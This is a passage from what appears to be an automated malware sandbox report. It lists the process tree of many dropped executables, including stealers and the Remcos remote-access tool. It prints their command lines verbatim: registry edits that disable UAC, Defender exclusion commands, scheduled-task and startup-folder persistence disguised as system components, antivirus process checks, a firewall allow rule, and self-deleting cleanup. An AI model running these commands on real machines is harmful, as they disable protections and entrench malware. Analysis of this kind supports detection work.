                                                            C:\Users\Admin\AppData\Local\Temp\2986912876.exe
                                                            6⤵
                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5976
                                                        • C:\Users\Admin\AppData\Local\Temp\2455110767.exe
                                                          C:\Users\Admin\AppData\Local\Temp\2455110767.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5444
                                                        • C:\Users\Admin\AppData\Local\Temp\1974532349.exe
                                                          C:\Users\Admin\AppData\Local\Temp\1974532349.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5752
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\runtime.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\runtime.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4592
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
                                                      3⤵
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5516
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\s.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5632
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\newbundle.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\newbundle.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies system certificate store
                                                      PID:5432
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5768
                                                      • C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5480
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 252
                                                        4⤵
                                                        • Program crash
                                                        PID:5864
                                                    • C:\Users\Admin\AppData\Local\Temp\Files\PctOccurred.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Files\PctOccurred.exe"
                                                      3⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6068
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
                                                        4⤵
                                                          PID:2016
                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                            tasklist
                                                            5⤵
                                                            • Enumerates processes with tasklist
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5560
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /I "wrsa.exe opssvc.exe"
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5348
                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                            tasklist
                                                            5⤵
                                                            • Enumerates processes with tasklist
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2156
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5540
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c md 193997
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3484
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V "JulieAppMagneticWhenever" Hist
                                                            5⤵
                                                              PID:448
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
                                                              5⤵
                                                                PID:1228
                                                              • C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                Restructuring.pif y
                                                                5⤵
                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:2292
                                                              • C:\Windows\SysWOW64\choice.exe
                                                                choice /d y /t 5
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5672
                                                          • C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6108
                                                          • C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6056
                                                            • C:\Users\Admin\AppData\Local\Temp\364619328.exe
                                                              C:\Users\Admin\AppData\Local\Temp\364619328.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:184
                                                          • C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe"
                                                            3⤵
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5632
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
                                                              4⤵
                                                                PID:5552
                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                  tasklist
                                                                  5⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:5420
                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                  findstr /I "wrsa opssvc"
                                                                  5⤵
                                                                    PID:5452
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist
                                                                    5⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:1300
                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                    findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4416
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c md 724598
                                                                    5⤵
                                                                      PID:5280
                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                      findstr /V "WowLiberalCalOfficer" Weight
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3184
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6048
                                                                    • C:\Users\Admin\AppData\Local\Temp\724598\Thermal.pif
                                                                      Thermal.pif y
                                                                      5⤵
                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:1384
                                                                      • C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\724598\RegAsm.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5656
                                                                    • C:\Windows\SysWOW64\choice.exe
                                                                      choice /d y /t 5
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:6068
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe"
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Checks processor information in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3708
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe" & del "C:\ProgramData\*.dll"" & exit
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3440
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 5
                                                                      5⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:164
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1728
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                    4⤵
                                                                    • Checks computer location settings
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5768
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2332
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5636
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:5940
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAA50.tmp.bat""
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5304
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout 3
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Delays execution with timeout.exe
                                                                      PID:1796
                                                                    • C:\Users\Admin\AppData\Roaming\Discord.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Discord.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:5928
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\444.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\444.exe"
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2368
                                                                  • C:\Users\Admin\AppData\Roaming\conhost.exe
                                                                    "C:\Users\Admin\AppData\Roaming\conhost.exe"
                                                                    4⤵
                                                                    • Drops startup file
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Drops autorun.inf file
                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                    PID:5952
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
                                                                      5⤵
                                                                      • Modifies Windows Firewall
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5368
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5456
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\f86nrrc6.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\f86nrrc6.exe"
                                                                  3⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3184
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\update.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5560
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\pothjadwtrgh.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Checks processor information in registry
                                                                  PID:3336
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 1296
                                                                    4⤵
                                                                    • Program crash
                                                                    PID:1724
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\putty.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\putty.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4428
                                                                • C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"
                                                                  3⤵
                                                                  • Adds policy Run key to start application
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies registry class
                                                                  PID:1528
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4112
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                      5⤵
                                                                      • UAC bypass
                                                                      • Modifies registry key
                                                                      PID:2884
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                                    4⤵
                                                                    • Checks computer location settings
                                                                    PID:2332
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
                                                                      5⤵
                                                                        PID:4460
                                                                        • C:\ProgramData\Remcos\remcos.exe
                                                                          C:\ProgramData\Remcos\remcos.exe
                                                                          6⤵
                                                                          • Adds policy Run key to start application
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5776
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                            7⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5628
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                              8⤵
                                                                              • UAC bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry key
                                                                              PID:5668
                                                                          • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                            "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                            7⤵
                                                                            • Adds policy Run key to start application
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:1916
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                              8⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1368
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                9⤵
                                                                                • UAC bypass
                                                                                • Modifies registry key
                                                                                PID:3096
                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                              svchost.exe
                                                                              8⤵
                                                                                PID:5440
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1596
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\factura.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\factura.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:392
                                                                      • C:\Users\Admin\AppData\Local\Sancerre\nonhazardousness.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\factura.exe"
                                                                        4⤵
                                                                        • Drops startup file
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:1580
                                                                        • C:\Users\Admin\AppData\Local\Sancerre\nonhazardousness.exe
                                                                          "C:\Users\Admin\AppData\Local\Sancerre\nonhazardousness.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:1988
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\test13.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\test13.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:2300
                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\langla.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\langla.exe"
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5652
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
                                                                        4⤵
                                                                          PID:6040
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:5508
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp95B5.tmp.bat""
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3544
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 3
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Delays execution with timeout.exe
                                                                            PID:4576
                                                                          • C:\Users\Admin\AppData\Roaming\http.exe
                                                                            "C:\Users\Admin\AppData\Roaming\http.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1620
                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\HKP098767890HJ.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\HKP098767890HJ.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:4144
                                                                        • C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\HKP098767890HJ.exe"
                                                                          4⤵
                                                                          • Drops startup file
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:740
                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\file.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4272
                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:532
                                                                        • C:\Users\Admin\AppData\Local\Temp\283409979.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\283409979.exe
                                                                          4⤵
                                                                            PID:3668
                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"
                                                                          3⤵
                                                                          • Checks processor information in registry
                                                                          PID:5004
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe" & rd /s /q "C:\ProgramData\47YMOHDTJW4E" & exit
                                                                            4⤵
                                                                              PID:2724
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 10
                                                                                5⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:2400
                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\china.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\china.exe"
                                                                            3⤵
                                                                            • Loads dropped DLL
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:624
                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"
                                                                            3⤵
                                                                              PID:696
                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\5.exe"
                                                                              3⤵
                                                                                PID:5652
                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\5.exe"
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1092
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "ver"
                                                                                    5⤵
                                                                                      PID:3592
                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:5484
                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"
                                                                                  3⤵
                                                                                  • Checks computer location settings
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4460
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
                                                                                    4⤵
                                                                                      PID:1272
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3032
                                                                                • C:\Windows\System32\schtasks.exe
                                                                                  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                  2⤵
                                                                                    PID:5936
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                    2⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1820
                                                                                  • C:\Windows\System32\conhost.exe
                                                                                    C:\Windows\System32\conhost.exe
                                                                                    2⤵
                                                                                      PID:1480
                                                                                    • C:\Windows\System32\dwm.exe
                                                                                      C:\Windows\System32\dwm.exe
                                                                                      2⤵
                                                                                        PID:4304
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\Admin\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
                                                                                        2⤵
                                                                                        • Drops startup file
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6060
                                                                                      • C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                                        C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:184
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                      1⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1776
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                        2⤵
                                                                                          PID:5696
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5764
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                          2⤵
                                                                                            PID:5992
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'G:\'
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Modifies data under HKEY_USERS
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:6040
                                                                                          • C:\Windows\System32\cmd.exe
